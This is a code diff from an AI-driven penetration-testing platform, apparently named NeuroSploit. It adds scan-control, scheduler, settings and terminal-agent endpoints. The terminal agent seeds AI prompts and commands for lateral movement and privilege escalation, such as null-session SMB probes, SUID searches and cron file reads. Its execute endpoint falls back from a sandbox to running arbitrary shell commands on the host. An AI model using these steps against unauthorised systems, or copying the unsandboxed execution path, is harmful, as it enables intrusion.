async def pause_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Pause a running scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "running":
raise HTTPException(status_code=400, detail="Scan is not running")
# Signal the agent to pause
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].pause()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "paused"
agent_results[agent_id]["phase"] = "paused"
scan.status = "paused"
scan.current_phase = "paused"
await db.commit()
await ws_manager.broadcast_log(scan_id, "warning", "Scan paused by user")
return {"message": "Scan paused", "scan_id": scan_id}
@router.post("/{scan_id}/resume")
async def resume_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Resume a paused scan"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "paused":
raise HTTPException(status_code=400, detail="Scan is not paused")
# Signal the agent to resume
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = "testing"
scan.status = "running"
scan.current_phase = "testing"
await db.commit()
await ws_manager.broadcast_log(scan_id, "info", "Scan resumed by user")
return {"message": "Scan resumed", "scan_id": scan_id}
@router.post("/{scan_id}/skip-to/{target_phase}")
async def skip_to_phase_endpoint(scan_id: str, target_phase: str, db: AsyncSession = Depends(get_db)):
"""Skip the current scan phase and jump to a target phase.
Valid phases: recon, analyzing, testing, completed
Can only skip forward (to a phase ahead of current).
"""
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# If paused, resume first so the skip can be processed
if scan.status == "paused":
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].resume()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "running"
agent_results[agent_id]["phase"] = agent_results[agent_id].get("last_phase", "testing")
scan.status = "running"
await db.commit()
if target_phase not in PHASE_ORDER:
raise HTTPException(
status_code=400,
detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(PHASE_ORDER[1:])}"
)
# Validate forward skip
current_idx = PHASE_ORDER.index(scan.current_phase) if scan.current_phase in PHASE_ORDER else 0
target_idx = PHASE_ORDER.index(target_phase)
if target_idx <= current_idx:
raise HTTPException(
status_code=400,
detail=f"Cannot skip backward. Current: {scan.current_phase}, target: {target_phase}"
)
# Signal the running scan to skip
success = _skip_to_phase(scan_id, target_phase)
if not success:
raise HTTPException(status_code=500, detail="Failed to signal phase skip")
# Broadcast via WebSocket
from backend.api.websocket import manager as ws_manager
await ws_manager.broadcast_log(scan_id, "warning", f">> User requested skip to phase: {target_phase}")
await ws_manager.broadcast_phase_change(scan_id, f"skipping_to_{target_phase}")
return {
"message": f"Skipping to phase: {target_phase}",
"scan_id": scan_id,
"from_phase": scan.current_phase,
"target_phase": target_phase
}
@router.get("/{scan_id}/status", response_model=ScanProgress)
async def get_scan_status(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Get scan progress and status"""
@@ -369,3 +505,68 @@ async def get_scan_vulnerabilities(
"page": page,
"per_page": per_page
}
class ValidationRequest(BaseModel):
validation_status: str # "validated" | "false_positive" | "ai_confirmed" | "ai_rejected" | "pending_review"
notes: Optional[str] = None
@router.patch("/vulnerabilities/{vuln_id}/validate")
async def validate_vulnerability(
vuln_id: str,
body: ValidationRequest,
db: AsyncSession = Depends(get_db)
):
"""Manually validate or reject a vulnerability finding"""
valid_statuses = {"validated", "false_positive", "ai_confirmed", "ai_rejected", "pending_review"}
if body.validation_status not in valid_statuses:
raise HTTPException(status_code=400, detail=f"Invalid status. Must be one of: {', '.join(valid_statuses)}")
result = await db.execute(select(Vulnerability).where(Vulnerability.id == vuln_id))
vuln = result.scalar_one_or_none()
if not vuln:
raise HTTPException(status_code=404, detail="Vulnerability not found")
old_status = vuln.validation_status or "ai_confirmed"
vuln.validation_status = body.validation_status
if body.notes:
vuln.ai_rejection_reason = body.notes
# Update scan severity counts when validation status changes
scan_result = await db.execute(select(Scan).where(Scan.id == vuln.scan_id))
scan = scan_result.scalar_one_or_none()
if scan:
sev = vuln.severity
# If changing from rejected to validated: add to counts
if old_status == "ai_rejected" and body.validation_status == "validated":
scan.total_vulnerabilities = (scan.total_vulnerabilities or 0) + 1
if sev == "critical":
scan.critical_count = (scan.critical_count or 0) + 1
elif sev == "high":
scan.high_count = (scan.high_count or 0) + 1
elif sev == "medium":
scan.medium_count = (scan.medium_count or 0) + 1
elif sev == "low":
scan.low_count = (scan.low_count or 0) + 1
elif sev == "info":
scan.info_count = (scan.info_count or 0) + 1
# If changing from confirmed to false_positive: subtract from counts
elif old_status in ("ai_confirmed", "validated") and body.validation_status == "false_positive":
scan.total_vulnerabilities = max(0, (scan.total_vulnerabilities or 0) - 1)
if sev == "critical":
scan.critical_count = max(0, (scan.critical_count or 0) - 1)
elif sev == "high":
scan.high_count = max(0, (scan.high_count or 0) - 1)
elif sev == "medium":
scan.medium_count = max(0, (scan.medium_count or 0) - 1)
elif sev == "low":
scan.low_count = max(0, (scan.low_count or 0) - 1)
elif sev == "info":
scan.info_count = max(0, (scan.info_count or 0) - 1)
await db.commit()
return {"message": "Vulnerability validation updated", "vulnerability": vuln.to_dict()}
+140
View File
@@ -0,0 +1,140 @@
"""
NeuroSploit v3 - Scheduler API Router
CRUD endpoints for managing scheduled scan jobs.
"""
import json
from pathlib import Path
from fastapi import APIRouter, HTTPException, Request
from pydantic import BaseModel
from typing import Optional, List, Dict
router = APIRouter()
CONFIG_PATH = Path(__file__).parent.parent.parent.parent / "config" / "config.json"
class ScheduleJobRequest(BaseModel):
"""Request model for creating a scheduled job."""
job_id: str
target: str
scan_type: str = "quick"
cron_expression: Optional[str] = None
interval_minutes: Optional[int] = None
agent_role: Optional[str] = None
llm_profile: Optional[str] = None
class ScheduleJobResponse(BaseModel):
"""Response model for a scheduled job."""
id: str
target: str
scan_type: str
schedule: str
status: str
next_run: Optional[str] = None
last_run: Optional[str] = None
run_count: int = 0
@router.get("/", response_model=List[Dict])
async def list_scheduled_jobs(request: Request):
"""List all scheduled scan jobs."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
return []
return scheduler.list_jobs()
@router.post("/", response_model=Dict)
async def create_scheduled_job(job: ScheduleJobRequest, request: Request):
"""Create a new scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
if not job.cron_expression and not job.interval_minutes:
raise HTTPException(
status_code=400,
detail="Either cron_expression or interval_minutes must be provided"
)
result = scheduler.add_job(
job_id=job.job_id,
target=job.target,
scan_type=job.scan_type,
cron_expression=job.cron_expression,
interval_minutes=job.interval_minutes,
agent_role=job.agent_role,
llm_profile=job.llm_profile
)
if "error" in result:
raise HTTPException(status_code=400, detail=result["error"])
return result
@router.delete("/{job_id}")
async def delete_scheduled_job(job_id: str, request: Request):
"""Delete a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.remove_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' deleted", "id": job_id}
@router.post("/{job_id}/pause")
async def pause_scheduled_job(job_id: str, request: Request):
"""Pause a scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.pause_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' paused", "id": job_id, "status": "paused"}
@router.post("/{job_id}/resume")
async def resume_scheduled_job(job_id: str, request: Request):
"""Resume a paused scheduled scan job."""
scheduler = getattr(request.app.state, 'scheduler', None)
if not scheduler:
raise HTTPException(status_code=503, detail="Scheduler not available")
success = scheduler.resume_job(job_id)
if not success:
raise HTTPException(status_code=404, detail=f"Job '{job_id}' not found")
return {"message": f"Job '{job_id}' resumed", "id": job_id, "status": "active"}
@router.get("/agent-roles", response_model=List[Dict])
async def get_agent_roles():
"""Return available agent roles from config.json for scheduler dropdown."""
try:
if not CONFIG_PATH.exists():
return []
config = json.loads(CONFIG_PATH.read_text())
roles = config.get("agent_roles", {})
result = []
for role_id, role_data in roles.items():
if role_data.get("enabled", True):
result.append({
"id": role_id,
"name": role_id.replace("_", " ").title(),
"description": role_data.get("description", ""),
"tools": role_data.get("tools_allowed", []),
})
return result
except Exception:
return []
+164 -18
View File
@@ -1,7 +1,10 @@
"""
NeuroSploit v3 - Settings API Endpoints
"""
from typing import Optional
import os
import re
from pathlib import Path
from typing import Optional, Dict
from fastapi import APIRouter, Depends, HTTPException
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, delete, text
@@ -12,16 +15,69 @@ from backend.models import Scan, Target, Endpoint, Vulnerability, VulnerabilityT
router = APIRouter()
# Path to .env file (project root)
ENV_FILE_PATH = Path(__file__).parent.parent.parent.parent / ".env"
def _update_env_file(updates: Dict[str, str]) -> bool:
"""
Update key=value pairs in the .env file without breaking formatting.
- If the key exists (even commented out), update its value
- If the key doesn't exist, append it
- Preserves comments and blank lines
"""
if not ENV_FILE_PATH.exists():
return False
try:
lines = ENV_FILE_PATH.read_text().splitlines()
updated_keys = set()
new_lines = []
for line in lines:
stripped = line.strip()
matched = False
for key, value in updates.items():
# Match: KEY=..., # KEY=..., #KEY=...
pattern = rf'^#?\s*{re.escape(key)}\s*='
if re.match(pattern, stripped):
# Replace with uncommented key=value
new_lines.append(f"{key}={value}")
updated_keys.add(key)
matched = True
break
if not matched:
new_lines.append(line)
# Append any keys that weren't found in existing file
for key, value in updates.items():
if key not in updated_keys:
new_lines.append(f"{key}={value}")
# Write back with trailing newline
ENV_FILE_PATH.write_text("\n".join(new_lines) + "\n")
return True
except Exception as e:
print(f"Warning: Failed to update .env file: {e}")
return False
class SettingsUpdate(BaseModel):
"""Settings update schema"""
llm_provider: Optional[str] = None
anthropic_api_key: Optional[str] = None
openai_api_key: Optional[str] = None
openrouter_api_key: Optional[str] = None
max_concurrent_scans: Optional[int] = None
aggressive_mode: Optional[bool] = None
default_scan_type: Optional[str] = None
recon_enabled_by_default: Optional[bool] = None
enable_model_routing: Optional[bool] = None
enable_knowledge_augmentation: Optional[bool] = None
enable_browser_validation: Optional[bool] = None
max_output_tokens: Optional[int] = None
class SettingsResponse(BaseModel):
@@ -29,56 +85,118 @@ class SettingsResponse(BaseModel):
llm_provider: str = "claude"
has_anthropic_key: bool = False
has_openai_key: bool = False
has_openrouter_key: bool = False
max_concurrent_scans: int = 3
aggressive_mode: bool = False
default_scan_type: str = "full"
recon_enabled_by_default: bool = True
enable_model_routing: bool = False
enable_knowledge_augmentation: bool = False
enable_browser_validation: bool = False
max_output_tokens: Optional[int] = None
# In-memory settings storage (in production, use database or config file)
_settings = {
"llm_provider": "claude",
"anthropic_api_key": "",
"openai_api_key": "",
"max_concurrent_scans": 3,
"aggressive_mode": False,
"default_scan_type": "full",
"recon_enabled_by_default": True
}
def _load_settings_from_env() -> dict:
"""
Load settings from environment variables / .env file on startup.
This ensures settings persist across server restarts and browser sessions.
"""
from dotenv import load_dotenv
# Re-read .env file to pick up disk-persisted values
if ENV_FILE_PATH.exists():
load_dotenv(ENV_FILE_PATH, override=True)
def _env_bool(key: str, default: bool = False) -> bool:
val = os.getenv(key, "").strip().lower()
if val in ("true", "1", "yes"):
return True
if val in ("false", "0", "no"):
return False
return default
def _env_int(key: str, default=None):
val = os.getenv(key, "").strip()
if val:
try:
return int(val)
except ValueError:
pass
return default
# Detect provider from which keys are set
provider = "claude"
if os.getenv("ANTHROPIC_API_KEY"):
provider = "claude"
elif os.getenv("OPENAI_API_KEY"):
provider = "openai"
elif os.getenv("OPENROUTER_API_KEY"):
provider = "openrouter"
return {
"llm_provider": provider,
"anthropic_api_key": os.getenv("ANTHROPIC_API_KEY", ""),
"openai_api_key": os.getenv("OPENAI_API_KEY", ""),
"openrouter_api_key": os.getenv("OPENROUTER_API_KEY", ""),
"max_concurrent_scans": _env_int("MAX_CONCURRENT_SCANS", 3),
"aggressive_mode": _env_bool("AGGRESSIVE_MODE", False),
"default_scan_type": os.getenv("DEFAULT_SCAN_TYPE", "full"),
"recon_enabled_by_default": _env_bool("RECON_ENABLED_BY_DEFAULT", True),
"enable_model_routing": _env_bool("ENABLE_MODEL_ROUTING", False),
"enable_knowledge_augmentation": _env_bool("ENABLE_KNOWLEDGE_AUGMENTATION", False),
"enable_browser_validation": _env_bool("ENABLE_BROWSER_VALIDATION", False),
"max_output_tokens": _env_int("MAX_OUTPUT_TOKENS", None),
}
# Load settings from .env on module import (server start)
_settings = _load_settings_from_env()
@router.get("", response_model=SettingsResponse)
async def get_settings():
"""Get current settings"""
import os
return SettingsResponse(
llm_provider=_settings["llm_provider"],
has_anthropic_key=bool(_settings["anthropic_api_key"]),
has_openai_key=bool(_settings["openai_api_key"]),
has_anthropic_key=bool(_settings["anthropic_api_key"] or os.getenv("ANTHROPIC_API_KEY")),
has_openai_key=bool(_settings["openai_api_key"] or os.getenv("OPENAI_API_KEY")),
has_openrouter_key=bool(_settings["openrouter_api_key"] or os.getenv("OPENROUTER_API_KEY")),
max_concurrent_scans=_settings["max_concurrent_scans"],
aggressive_mode=_settings["aggressive_mode"],
default_scan_type=_settings["default_scan_type"],
recon_enabled_by_default=_settings["recon_enabled_by_default"]
recon_enabled_by_default=_settings["recon_enabled_by_default"],
enable_model_routing=_settings["enable_model_routing"],
enable_knowledge_augmentation=_settings["enable_knowledge_augmentation"],
enable_browser_validation=_settings["enable_browser_validation"],
max_output_tokens=_settings["max_output_tokens"]
)
@router.put("", response_model=SettingsResponse)
async def update_settings(settings_data: SettingsUpdate):
"""Update settings"""
"""Update settings - persists to memory, env vars, AND .env file"""
env_updates: Dict[str, str] = {}
if settings_data.llm_provider is not None:
_settings["llm_provider"] = settings_data.llm_provider
if settings_data.anthropic_api_key is not None:
_settings["anthropic_api_key"] = settings_data.anthropic_api_key
# Also update environment variable for LLM calls
import os
if settings_data.anthropic_api_key:
os.environ["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
env_updates["ANTHROPIC_API_KEY"] = settings_data.anthropic_api_key
if settings_data.openai_api_key is not None:
_settings["openai_api_key"] = settings_data.openai_api_key
import os
if settings_data.openai_api_key:
os.environ["OPENAI_API_KEY"] = settings_data.openai_api_key
env_updates["OPENAI_API_KEY"] = settings_data.openai_api_key
if settings_data.openrouter_api_key is not None:
_settings["openrouter_api_key"] = settings_data.openrouter_api_key
if settings_data.openrouter_api_key:
os.environ["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
env_updates["OPENROUTER_API_KEY"] = settings_data.openrouter_api_key
if settings_data.max_concurrent_scans is not None:
_settings["max_concurrent_scans"] = settings_data.max_concurrent_scans
@@ -92,6 +210,34 @@ async def update_settings(settings_data: SettingsUpdate):
if settings_data.recon_enabled_by_default is not None:
_settings["recon_enabled_by_default"] = settings_data.recon_enabled_by_default
if settings_data.enable_model_routing is not None:
_settings["enable_model_routing"] = settings_data.enable_model_routing
val = str(settings_data.enable_model_routing).lower()
os.environ["ENABLE_MODEL_ROUTING"] = val
env_updates["ENABLE_MODEL_ROUTING"] = val
if settings_data.enable_knowledge_augmentation is not None:
_settings["enable_knowledge_augmentation"] = settings_data.enable_knowledge_augmentation
val = str(settings_data.enable_knowledge_augmentation).lower()
os.environ["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
env_updates["ENABLE_KNOWLEDGE_AUGMENTATION"] = val
if settings_data.enable_browser_validation is not None:
_settings["enable_browser_validation"] = settings_data.enable_browser_validation
val = str(settings_data.enable_browser_validation).lower()
os.environ["ENABLE_BROWSER_VALIDATION"] = val
env_updates["ENABLE_BROWSER_VALIDATION"] = val
if settings_data.max_output_tokens is not None:
_settings["max_output_tokens"] = settings_data.max_output_tokens
if settings_data.max_output_tokens:
os.environ["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
env_updates["MAX_OUTPUT_TOKENS"] = str(settings_data.max_output_tokens)
# Persist to .env file on disk
if env_updates:
_update_env_file(env_updates)
return await get_settings()
+568
View File
@@ -0,0 +1,568 @@
"""
Terminal Agent API - Interactive infrastructure pentesting via AI chat + Docker sandbox.
Provides session-based terminal interaction with AI-guided command execution,
exploitation path tracking, and VPN status monitoring.
"""
import asyncio
import re
import time
import uuid
from datetime import datetime, timezone
from typing import Dict, List, Optional
from fastapi import APIRouter, HTTPException
from pydantic import BaseModel
from core.llm_manager import LLMManager
from core.sandbox_manager import get_sandbox
router = APIRouter()
# ---------------------------------------------------------------------------
# In-memory session store
# ---------------------------------------------------------------------------
terminal_sessions: Dict[str, Dict] = {}
# ---------------------------------------------------------------------------
# Pre-built templates
# ---------------------------------------------------------------------------
TEMPLATES = {
"network_scanner": {
"name": "Network Scanner",
"description": "Host discovery, port scanning, and service detection",
"system_prompt": (
"You are an expert network reconnaissance specialist. You guide the "
"operator through systematic host discovery, port scanning, and service "
"fingerprinting. Always suggest nmap flags appropriate for the situation, "
"explain output, and recommend next steps based on discovered services. "
"Prioritize stealth when asked and suggest timing/fragmentation options."
),
"initial_commands": [
"nmap -sn {target}",
"nmap -sV -sC -O -p- {target}",
"nmap -sU --top-ports 50 {target}",
],
},
"lateral_movement": {
"name": "Lateral Movement",
"description": "Pass-the-hash, SMB/WinRM pivoting, and SSH tunneling",
"system_prompt": (
"You are a lateral movement specialist. You help the operator pivot "
"through compromised networks using techniques such as pass-the-hash, "
"SMB relay, WinRM sessions, SSH tunneling, and SOCKS proxying. Always "
"verify credentials before attempting pivots, suggest cleanup steps, "
"and track which hosts have been compromised."
),
"initial_commands": [
"crackmapexec smb {target} -u '' -p ''",
"crackmapexec smb {target} --shares -u '' -p ''",
"ssh -D 1080 -N -f user@{target}",
],
},
"privilege_escalation": {
"name": "Privilege Escalation",
"description": "SUID binaries, kernel exploits, cron jobs, and writable paths",
"system_prompt": (
"You are a privilege escalation expert for Linux and Windows systems. "
"Guide the operator through enumeration of SUID/SGID binaries, kernel "
"version checks, misconfigured cron jobs, writable PATH directories, "
"sudo misconfigurations, and capability abuse. Suggest automated tools "
"like linpeas/winpeas when appropriate and explain each finding."
),
"initial_commands": [
"id && whoami && uname -a",
"find / -perm -4000 -type f 2>/dev/null",
"cat /etc/crontab && ls -la /etc/cron.*",
"echo $PATH | tr ':' '\\n' | xargs -I {} ls -ld {}",
],
},
"vpn_recon": {
"name": "VPN Reconnaissance",
"description": "VPN connection management and internal network discovery",
"system_prompt": (
"You are a VPN and internal network reconnaissance specialist. You "
"help the operator connect to target VPNs, verify tunnel status, "
"discover internal subnets, and enumerate services behind the VPN. "
"Always confirm connectivity before proceeding with scans and suggest "
"appropriate scope for internal reconnaissance."
),
"initial_commands": [
"openvpn --config client.ovpn --daemon",
"ip addr show tun0",
"ip route | grep tun",
"nmap -sn 10.0.0.0/24",
],
},
}
# ---------------------------------------------------------------------------
# Pydantic request / response models
# ---------------------------------------------------------------------------
class CreateSessionRequest(BaseModel):
template_id: Optional[str] = None
target: Optional[str] = ""
name: Optional[str] = ""
class MessageRequest(BaseModel):
message: str
class ExecuteCommandRequest(BaseModel):
command: str
execution_method: str = "sandbox" # "sandbox" or "direct"
class ExploitationStepRequest(BaseModel):
description: str
command: Optional[str] = ""
result: Optional[str] = ""
step_type: str = "recon" # recon | exploit | pivot | escalate | action
class SessionSummary(BaseModel):
session_id: str
name: str
target: str
template_id: Optional[str]
status: str
created_at: str
messages_count: int
commands_count: int
class MessageResponse(BaseModel):
role: str
response: str
timestamp: str
suggested_commands: List[str]
class CommandResult(BaseModel):
command: str
exit_code: int
stdout: str
stderr: str
duration: float
execution_method: str
timestamp: str
class VPNStatus(BaseModel):
connected: bool
ip: Optional[str] = None
# ---------------------------------------------------------------------------
# Helpers
# ---------------------------------------------------------------------------
def _now_iso() -> str:
return datetime.now(timezone.utc).isoformat()
def _build_session(
session_id: str,
name: str,
target: str,
template_id: Optional[str],
) -> Dict:
return {
"session_id": session_id,
"name": name,
"target": target,
"template_id": template_id,
"status": "active",
"created_at": _now_iso(),
"messages": [],
"command_history": [],
"exploitation_path": [],
"vpn_status": {"connected": False, "ip": None},
}
def _get_session(session_id: str) -> Dict:
session = terminal_sessions.get(session_id)
if not session:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
return session
def _build_context_string(
messages: List[Dict],
commands: List[Dict],
exploitation: List[Dict],
) -> str:
parts: List[str] = []
if messages:
parts.append("=== Recent Conversation ===")
for msg in messages:
role = msg.get("role", "unknown").upper()
parts.append(f"[{role}] {msg.get('content', '')}")
if commands:
parts.append("\n=== Recent Command Results ===")
for cmd in commands:
parts.append(
f"$ {cmd['command']}\n"
f"Exit code: {cmd['exit_code']}\n"
f"Stdout: {cmd['stdout'][:500]}\n"
f"Stderr: {cmd['stderr'][:300]}"
)
if exploitation:
parts.append("\n=== Exploitation Path ===")
for i, step in enumerate(exploitation, 1):
parts.append(
f"Step {i} [{step['step_type']}]: {step['description']}"
)
if step.get("command"):
parts.append(f" Command: {step['command']}")
if step.get("result"):
parts.append(f" Result: {step['result'][:300]}")
return "\n".join(parts)
def _extract_suggested_commands(text: str) -> List[str]:
"""Extract commands from backtick-fenced code blocks."""
blocks = re.findall(r"```(?:bash|sh|shell)?\n?(.*?)```", text, re.DOTALL)
commands: List[str] = []
for block in blocks:
for line in block.strip().splitlines():
stripped = line.strip()
if stripped and not stripped.startswith("#"):
commands.append(stripped)
return commands
# ---------------------------------------------------------------------------
# Template endpoints
# ---------------------------------------------------------------------------
@router.get("/templates")
async def list_templates():
"""List all available session templates."""
result = []
for tid, tmpl in TEMPLATES.items():
result.append({
"id": tid,
"name": tmpl["name"],
"description": tmpl["description"],
"initial_commands": tmpl["initial_commands"],
})
return result
# ---------------------------------------------------------------------------
# Session CRUD
# ---------------------------------------------------------------------------
@router.post("/session")
async def create_session(req: CreateSessionRequest):
"""Create a new terminal session, optionally from a template."""
session_id = str(uuid.uuid4())
target = req.target or ""
template_id = req.template_id
if template_id and template_id not in TEMPLATES:
raise HTTPException(status_code=400, detail=f"Unknown template: {template_id}")
name = req.name or (
TEMPLATES[template_id]["name"] if template_id else f"Session {session_id[:8]}"
)
session = _build_session(session_id, name, target, template_id)
# Seed initial system message from template
if template_id:
tmpl = TEMPLATES[template_id]
session["messages"].append({
"role": "system",
"content": tmpl["system_prompt"],
"timestamp": _now_iso(),
"metadata": {"template": template_id},
})
# Provide initial suggested commands with target interpolated
initial_cmds = [
cmd.replace("{target}", target) for cmd in tmpl["initial_commands"]
]
session["messages"].append({
"role": "assistant",
"content": (
f"Session initialised with the **{tmpl['name']}** template.\n\n"
f"Target: `{target or '(not set)'}`\n\n"
"Suggested starting commands:\n"
+ "\n".join(f"```\n{c}\n```" for c in initial_cmds)
),
"timestamp": _now_iso(),
"suggested_commands": initial_cmds,
})
terminal_sessions[session_id] = session
return session
@router.get("/sessions")
async def list_sessions():
"""Return lightweight summaries of every session."""
summaries = []
for sid, s in terminal_sessions.items():
summaries.append(
SessionSummary(
session_id=sid,
name=s["name"],
target=s["target"],
template_id=s["template_id"],
status=s["status"],
created_at=s["created_at"],
messages_count=len(s["messages"]),
commands_count=len(s["command_history"]),
).model_dump()
)
return summaries
@router.get("/sessions/{session_id}")
async def get_session(session_id: str):
"""Return the full session including messages, commands, and exploitation path."""
return _get_session(session_id)
@router.delete("/sessions/{session_id}")
async def delete_session(session_id: str):
"""Delete a terminal session."""
if session_id not in terminal_sessions:
raise HTTPException(status_code=404, detail=f"Session {session_id} not found")
del terminal_sessions[session_id]
return {"status": "deleted", "session_id": session_id}
# ---------------------------------------------------------------------------
# AI message interaction
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/message")
async def send_message(session_id: str, req: MessageRequest):
"""Send a user prompt to the AI and receive a response with suggested commands."""
session = _get_session(session_id)
user_message = req.message.strip()
if not user_message:
raise HTTPException(status_code=400, detail="Message content cannot be empty")
# Record user message
session["messages"].append({
"role": "user",
"content": user_message,
"timestamp": _now_iso(),
"metadata": {},
})
# Determine system prompt
template_id = session.get("template_id")
if template_id and template_id in TEMPLATES:
system_prompt = TEMPLATES[template_id]["system_prompt"]
else:
system_prompt = (
"You are an expert infrastructure penetration tester. Help the "
"operator plan and execute attacks against the target. Suggest "
"concrete commands, explain their purpose, and interpret output. "
"Always wrap commands in fenced code blocks so they can be extracted."
)
# Build context window
context_messages = session["messages"][-20:]
context_cmds = session["command_history"][-10:]
exploitation = session["exploitation_path"]
context = _build_context_string(context_messages, context_cmds, exploitation)
# Call LLM
try:
llm = LLMManager()
prompt = f"{context}\n\nUser: {user_message}"
response = await llm.generate(prompt, system_prompt)
except Exception as exc:
raise HTTPException(status_code=502, detail=f"LLM call failed: {exc}")
suggested_commands = _extract_suggested_commands(response)
# Record assistant response
session["messages"].append({
"role": "assistant",
"content": response,
"timestamp": _now_iso(),
"suggested_commands": suggested_commands,
})
return MessageResponse(
role="assistant",
response=response,
timestamp=session["messages"][-1]["timestamp"],
suggested_commands=suggested_commands,
).model_dump()
# ---------------------------------------------------------------------------
# Command execution
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/execute")
async def execute_command(session_id: str, req: ExecuteCommandRequest):
"""Execute a command in the Docker sandbox (fallback: direct shell)."""
session = _get_session(session_id)
command = req.command.strip()
if not command:
raise HTTPException(status_code=400, detail="Command cannot be empty")
start = time.time()
stdout = ""
stderr = ""
exit_code = -1
execution_method = "direct"
# Use requested execution method
use_sandbox = req.execution_method == "sandbox"
if use_sandbox:
try:
sandbox = await get_sandbox()
if sandbox and sandbox.is_available:
result = await sandbox.execute_raw(command)
stdout = result.stdout
stderr = result.stderr
exit_code = result.exit_code
execution_method = "sandbox"
except Exception:
pass # Fall through to direct execution
# Fallback or direct execution requested
if execution_method != "sandbox":
try:
proc = await asyncio.create_subprocess_shell(
command,
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, raw_stderr = await asyncio.wait_for(
proc.communicate(), timeout=120
)
stdout = raw_stdout.decode(errors="replace")
stderr = raw_stderr.decode(errors="replace")
exit_code = proc.returncode or 0
execution_method = "direct"
except asyncio.TimeoutError:
stderr = "Command timed out after 120 seconds"
exit_code = 124
except Exception as exc:
stderr = str(exc)
exit_code = 1
duration = round(time.time() - start, 3)
cmd_record = {
"command": command,
"exit_code": exit_code,
"stdout": stdout,
"stderr": stderr,
"duration": duration,
"execution_method": execution_method,
"timestamp": _now_iso(),
}
session["command_history"].append(cmd_record)
# Mirror into messages for AI context continuity
output_preview = stdout[:2000] if stdout else stderr[:2000]
session["messages"].append({
"role": "tool",
"content": f"$ {command}\n[exit {exit_code}] ({execution_method}, {duration}s)\n{output_preview}",
"timestamp": cmd_record["timestamp"],
"metadata": {"exit_code": exit_code, "execution_method": execution_method},
})
return CommandResult(**cmd_record).model_dump()
# ---------------------------------------------------------------------------
# Exploitation path
# ---------------------------------------------------------------------------
@router.post("/sessions/{session_id}/exploitation-path")
async def add_exploitation_step(session_id: str, req: ExploitationStepRequest):
"""Add a manual step to the exploitation path timeline."""
session = _get_session(session_id)
valid_types = {"recon", "exploit", "pivot", "escalate", "action"}
if req.step_type not in valid_types:
raise HTTPException(
status_code=400,
detail=f"step_type must be one of {sorted(valid_types)}",
)
step = {
"description": req.description,
"command": req.command or "",
"result": req.result or "",
"timestamp": _now_iso(),
"step_type": req.step_type,
}
session["exploitation_path"].append(step)
return step
@router.get("/sessions/{session_id}/exploitation-path")
async def get_exploitation_path(session_id: str):
"""Return the full exploitation path timeline."""
session = _get_session(session_id)
return session["exploitation_path"]
# ---------------------------------------------------------------------------
# VPN status
# ---------------------------------------------------------------------------
@router.get("/sessions/{session_id}/vpn-status")
async def get_vpn_status(session_id: str):
"""Check OpenVPN process and tun0 interface status."""
session = _get_session(session_id)
connected = False
ip_addr: Optional[str] = None
# Check for running openvpn process
try:
proc = await asyncio.create_subprocess_shell(
"pgrep -a openvpn",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0 and raw_stdout.strip():
connected = True
except Exception:
pass
# Check tun0 interface for IP
if connected:
try:
proc = await asyncio.create_subprocess_shell(
"ip addr show tun0",
stdout=asyncio.subprocess.PIPE,
stderr=asyncio.subprocess.PIPE,
)
raw_stdout, _ = await asyncio.wait_for(proc.communicate(), timeout=5)
if proc.returncode == 0:
match = re.search(
r"inet\s+(\d+\.\d+\.\d+\.\d+)", raw_stdout.decode(errors="replace")
)
if match:
ip_addr = match.group(1)
except Exception:
pass
vpn = {"connected": connected, "ip": ip_addr}
session["vpn_status"] = vpn
return VPNStatus(**vpn).model_dump()
+876
View File
@@ -0,0 +1,876 @@
"""
NeuroSploit v3 - Vulnerability Lab API Endpoints
Isolated vulnerability testing against labs, CTFs, and PortSwigger challenges.
Test individual vuln types one at a time and track results.
"""
